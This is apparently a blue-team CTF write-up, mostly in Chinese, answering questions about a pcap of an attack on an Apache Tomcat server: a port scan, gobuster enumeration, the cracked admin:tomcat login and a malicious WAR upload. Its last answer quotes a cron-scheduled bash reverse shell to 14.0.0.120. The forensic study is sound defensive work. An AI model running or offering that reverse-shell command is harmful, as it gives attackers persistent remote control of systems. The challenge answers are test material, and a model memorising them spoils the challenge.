# Tomcat Takeover Blue Team Challenge
:::success
https://cyberdefenders.org/blueteam-ctf-challenges/135#nav-questions
:::
:::info
Scenario:
Our SOC team has detected suspicious activity on one of the web servers within the company's intranet. In order to gain a deeper understanding of the situation, the team has captured network traffic for analysis. This pcap file potentially contains a series of malicious activities that have resulted in the compromise of the Apache Tomcat web server. We need to investigate this incident further.
Tools:
Wireshark
NetworkMiner
:::
#### 1. Given the suspicious activity detected on the web server, the pcap analysis shows a series of requests across various ports, suggesting a potential scanning behavior. Can you identify the source IP address responsible for initiating these requests on our server?
```
14.0.0.120
```
檢視Conversation,發顯有一個外網IP 14.0.0.120
檢視I/O Graphs 發現20:17 - 20:20間有短時間大量封包的跡象
針對外網IP 14.0.0.120 進行查詢,發現他有port scan的行為。
#### 2. Based on the identified IP address associated with the attacker, can you ascertain the city from which the attacker's activities originated?
```
GUANGZHOU
```
WHOIS查詢14.0.0.120
#### 3. From the pcap analysis, multiple open ports were detected as a result of the attacker's activitie scan. Which of these ports provides access to the web server admin panel?
```
8080
```
將14.0.0.120對10.0.0.112 port scan 的封包過濾掉之後進行檢視,會發現14.0.0.120對10.0.0.112主要都是透過8080port溝通,其中也可以找到有一筆是走8080port POST /manager/html/upload 上傳了一個JXQOZY.war的檔案。
#### 4. Following the discovery of open ports on our server, it appears that the attacker attempted to enumerate and uncover directories and files on our web server. Which tools can you identify from the analysis that assisted the attacker in this enumeration process?
```
gobuster
```
發現14.0.0.120的user agent 有兩個,一個是firefox瀏覽器,另一個是gobuster
gobuster是web暴力破解工具
#### 5. Subsequent to their efforts to enumerate directories on our web server, the attacker made numerous requests trying to identify administrative interfaces. Which specific directory associated with the admin panel was the attacker able to uncover?
```
/manager
```
攻擊者掃描過程中發現/manager目錄下有大量指令可利用
#### 6. Upon accessing the admin panel, the attacker made attempts to brute-force the login credentials. From the data, can you identify the correct username and password combination that the attacker successfully used for authorization?
```
admin:tomcat
```
觀察封包可以發現有存在連續的Unauthorized
Follow tcp,確認驗證參數為YWRtaW46dG9tY2F0時,server端回覆200
用base64解開
從封包中的credentials欄位也可以看到
#### 7. Once inside the admin panel, the attacker attempted to upload a file with the intent of establishing a reverse shell. Can you identify the name of this malicious file from the captured data?
```
JXQOZY.war
```
依前面搜尋的結果,可以發現攻擊者利用/manager/html/upload 上傳了一個JXQOZY.war的檔案。
#### 8. Upon successfully establishing a reverse shell on our server, the attacker aimed to ensure persistence on the compromised machine. From the analysis, can you determine the specific command they are scheduled to run to maintain their presence?
```
/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'
```
觀察reverse shell建立之後的封包,follow tcp封包可以看到攻擊者先是進行whoami、pwd的基本指令後,將建立reverse shell的bash指令寫道排成裡面,來確保reverse shell會一直執行。
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'" > cron
參考資料:
https://ithelp.ithome.com.tw/m/articles/10323534
Sign in with Wallet
Connect another wallet